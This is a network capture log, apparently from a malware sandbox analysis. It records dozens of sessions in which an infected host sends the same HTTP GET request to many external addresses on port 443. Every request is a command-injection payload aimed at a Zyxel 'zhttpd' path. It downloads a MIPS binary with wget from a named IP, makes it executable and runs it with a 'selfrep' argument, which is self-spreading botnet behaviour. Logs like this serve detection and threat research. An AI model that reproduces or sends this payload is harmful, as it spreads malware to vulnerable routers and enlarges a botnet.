                                      Jan 19, 2024 17:29:51.146008015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9079192.168.2.1436874169.157.174.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146022081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9080192.168.2.1452180144.148.172.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146053076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9081192.168.2.14565261.139.131.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146084070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9082192.168.2.146059281.40.29.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146130085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9083192.168.2.143405893.110.235.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146146059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9084192.168.2.1433230209.110.51.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146179914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9085192.168.2.144920013.248.225.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146213055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9086192.168.2.1451636158.17.113.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146245956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9087192.168.2.1458014142.43.219.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146270990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9088192.168.2.1456066121.15.199.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146311998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9089192.168.2.1452304141.7.243.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146346092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9090192.168.2.1460428143.44.55.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146375895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9091192.168.2.14410749.134.125.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146421909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9092192.168.2.1449540136.27.248.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146460056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9093192.168.2.1458512217.106.211.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146470070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9094192.168.2.1456906132.30.48.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146503925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9095192.168.2.144430696.73.127.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146548986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9096192.168.2.1450296130.194.162.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146574974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9097192.168.2.1452282121.233.145.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146614075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9098192.168.2.1454898156.120.126.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146632910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9099192.168.2.1445482151.103.49.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146677017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9100192.168.2.1448572191.108.165.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146735907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9101192.168.2.1457566113.12.128.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146756887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9102192.168.2.1442346210.202.116.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146796942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9103192.168.2.1449316202.129.168.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146821022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9104192.168.2.1459634145.28.6.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146835089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9105192.168.2.1444694112.199.136.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146874905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9106192.168.2.1437184146.71.140.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146900892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9107192.168.2.1435068110.70.99.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146934032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9108192.168.2.143860651.181.161.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.146960974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9109192.168.2.1458432183.210.49.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147000074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9110192.168.2.145885257.247.91.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147039890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9111192.168.2.145923490.248.198.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147073984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9112192.168.2.1445360167.92.124.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147113085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9113192.168.2.1442324121.168.123.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147170067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9114192.168.2.143902698.141.27.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147181034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9115192.168.2.143704684.114.76.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147238970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9116192.168.2.1459402193.2.97.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147265911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9117192.168.2.1460588195.72.68.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147303104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9118192.168.2.144330836.139.72.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147342920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9119192.168.2.1445658112.5.137.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147362947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9120192.168.2.1432844145.92.25.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147397995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9121192.168.2.1444060191.132.184.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147423983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9122192.168.2.1451042142.237.183.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147454977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9123192.168.2.145561290.111.194.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147506952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9124192.168.2.1439308121.207.62.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147528887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9125192.168.2.144432440.131.48.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147559881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9126192.168.2.145327495.97.111.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147592068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9127192.168.2.145098624.123.88.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147635937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9128192.168.2.1436034216.144.40.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147679090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9129192.168.2.1438754120.173.38.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147711992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9130192.168.2.1442358216.29.158.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147753954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9131192.168.2.1441166111.11.233.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147779942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9132192.168.2.143457813.84.179.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147810936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9133192.168.2.145765263.30.172.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147835970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9134192.168.2.1448568107.51.194.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147871971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9135192.168.2.1460310134.249.97.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147919893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9136192.168.2.1456156217.70.113.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.147952080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9137192.168.2.1452126137.198.43.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148014069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9138192.168.2.144050077.170.115.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148041010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9139192.168.2.144351843.75.110.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148075104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9140192.168.2.1442356221.25.55.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148103952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9141192.168.2.1446188116.95.252.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:51.148138046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9142192.168.2.1435748102.110.25.224443
                                      TimestampBytes transferredDirectionData
